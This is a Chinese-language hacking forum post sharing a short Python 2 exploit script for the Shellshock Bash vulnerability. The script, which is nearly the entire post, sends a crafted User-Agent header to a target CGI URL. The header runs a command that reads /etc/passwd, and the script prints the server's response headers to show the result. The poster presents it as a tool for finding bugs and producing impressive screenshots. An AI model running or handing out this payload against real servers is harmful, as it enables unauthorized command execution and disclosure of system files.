搜索
查看: 684|回复: 0

Bash命令执行漏洞利用小脚本

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-9-29 09:39:14 | 显示全部楼层 |阅读模式
代码如下:
  1. #coding:utf-8
  2. import urllib,httplib
  3. import sys,re,urlparse
  4. #author:nx4dm1n
  5. #website:http://www.nxadmin.com

  6. def bash_exp(url):
  7.     urlsp=urlparse.urlparse(url)
  8.     hostname=urlsp.netloc
  9.     urlpath=urlsp.path
  10.     conn=httplib.HTTPConnection(hostname)
  11.     headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
  12.     conn.request("GET",urlpath,headers=headers)
  13.     res=conn.getresponse()
  14.     res=res.getheaders()
  15.     for passwdstr in res:
  16.         print passwdstr[0]+':'+passwdstr[1]
  17.          
  18.      
  19. if __name__=='__main__':
  20.      
  21.     #带http的url
  22.     if len(sys.argv)<2:
  23.         print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"
  24.         sys.exit()
  25.     else:
  26.         bash_exp(sys.argv[1])
复制代码

效果如图:


没啥亮点,主要就是有回显,挖个洞,用这个截个图,就顿时觉得高大上了。没回显的截图看着不高大上!^_^

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表